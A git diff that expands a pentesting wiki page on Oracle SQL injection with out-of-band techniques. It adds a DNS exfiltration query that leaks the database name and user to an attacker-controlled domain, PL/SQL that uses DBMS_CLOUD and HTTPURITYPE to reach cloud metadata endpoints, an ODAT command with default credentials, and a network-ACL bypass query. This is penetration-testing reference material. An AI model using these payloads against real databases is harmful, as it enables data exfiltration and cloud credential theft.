Merge pull request #1242 from HackTricks-wiki/research_update_src_pentesting-web_sql-injection_oracle-injection_20250805_162114

carlospolop · web-flow · commit eaa7e4ce2958 · 2025-08-20T02:05:30.000+02:00
Research Update Enhanced src/pentesting-web/sql-injection/or...
diff --git a/src/pentesting-web/sql-injection/oracle-injection.md b/src/pentesting-web/sql-injection/oracle-injection.md
@@ -156,9 +156,99 @@ select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
 
 A `ORA-12541: TNS:no listener` or a `TNS:operation timed out` is a sign that the TCP port is closed, whereas a `ORA-29263: HTTP protocol error` or data is a sign that the port is open.
 
-Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
+Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)
 
-{{#include ../../banners/hacktricks-training.md}}
+```
+SELECT HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() FROM dual;
+```
+
+---
+
+## Additional Packages & Techniques (Oracle 19c → 23c)
+
+### UTL_INADDR – DNS-based exfiltration and host discovery
+
+`UTL_INADDR` exposes simple name-resolution helpers that trigger an outbound DNS lookup from the database host.  Because only a domain is required (no port/ACL needed) it is a reliable primitive for blind-exfil when other network callouts are blocked.
+
+```sql
+-- Leak the DB name and current user via a DNS query handled by Burp Collaborator
+SELECT UTL_INADDR.get_host_address(
+         (SELECT name FROM v$database)||'.'||(SELECT user FROM dual)||
+         '.attacker.oob.server') FROM dual;
+```
+
+`get_host_address()` returns the resolved IP (or raises `ORA-29257` if resolution fails).  The attacker only needs to watch for the incoming DNS request on the controlled domain to confirm code execution.
+
+### DBMS_CLOUD.SEND_REQUEST – full HTTP client on Autonomous/23c
+
+Recent cloud-centric editions (Autonomous Database, 21c/23c, 23ai) ship with `DBMS_CLOUD`.  The `SEND_REQUEST` function acts as a general-purpose HTTP client that supports custom verbs, headers, TLS and large bodies, making it far more powerful than the classical `UTL_HTTP`.
+
+```sql
+-- Assuming the current user has CREATE CREDENTIAL and network ACL privileges
+BEGIN
+  -- empty credential when no auth is required
+  DBMS_CLOUD.create_credential(
+      credential_name => 'NOAUTH',
+      username        => 'ignored',
+      password        => 'ignored');
+END;
+/
+
+DECLARE
+  resp  DBMS_CLOUD_TYPES.resp;
+BEGIN
+  resp := DBMS_CLOUD.send_request(
+             credential_name => 'NOAUTH',
+             uri             => 'http://169.254.169.254/latest/meta-data/',
+             method          => 'GET',
+             timeout         => 3);
+  dbms_output.put_line(DBMS_CLOUD.get_response_text(resp));
+END;
+/
+```
+
+Because `SEND_REQUEST` allows arbitrary target URIs it can be abused via SQLi for:
+1. Internal port scanning / SSRF to cloud metadata services.
+2. Out-of-band exfiltration over HTTPS (use Burp Collaborator or an `ngrok` tunnel).
+3. Callbacks to attacker servers even when older callout packages are disabled by ACLs.
+
+ℹ️ If you only have a classical on-prem 19c but can create Java stored procedures, you can sometimes install `DBMS_CLOUD` from the OCI client bundle — useful in some engagements.
+
+### Automating the attack surface with **ODAT**
+
+[ODAT – Oracle Database Attacking Tool](https://github.com/quentinhardy/odat) has kept pace with modern releases (tested up to 19c, 5.1.1 – Apr-2022).  The `–utl_http`, `–utl_tcp`, `–httpuritype` and newer `–dbms_cloud` modules automatically:
+* Detect usable callout packages/ACL grants.
+* Trigger DNS & HTTP callbacks for blind extraction.
+* Generate ready-to-copy SQL payloads for Burp/SQLMap.
+
+Example: quick OOB check with default creds (takes care of ACL enumeration in the background):
+
+```bash
+odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules oob
+```
+
+### Recent network ACL restrictions & bypasses
+
+Oracle tightened default Network ACLs in the July 2023 CPU — unprivileged accounts now receive `ORA-24247: network access denied by access control list` by default.  Two patterns still allow callouts through SQLi:
+1. Target account owns an ACL entry (`DBMS_NETWORK_ACL_ADMIN.create_acl`) that was added by a developer for integrations.
+2. The attacker abuses a high-privilege PL/SQL definer-rights routine (e.g. in a custom application) that *already* has `AUTHID DEFINER` and the necessary grants.
 
+If you encounter `ORA-24247` during exploitation always search for reusable procedures:
+
+```sql
+SELECT owner, object_name
+FROM   dba_objects
+WHERE  object_type = 'PROCEDURE'
+  AND  authid       = 'DEFINER';
+```
 
+(in many audits at least one reporting/export procedure had the needed rights).
 
+---
+
+## References
+
+* Oracle Docs – `DBMS_CLOUD.SEND_REQUEST` package description and examples. 
+* quentinhardy/odat – Oracle Database Attacking Tool (latest release 5.1.1, Apr-2022). 
+
+{{#include ../../banners/hacktricks-training.md}}
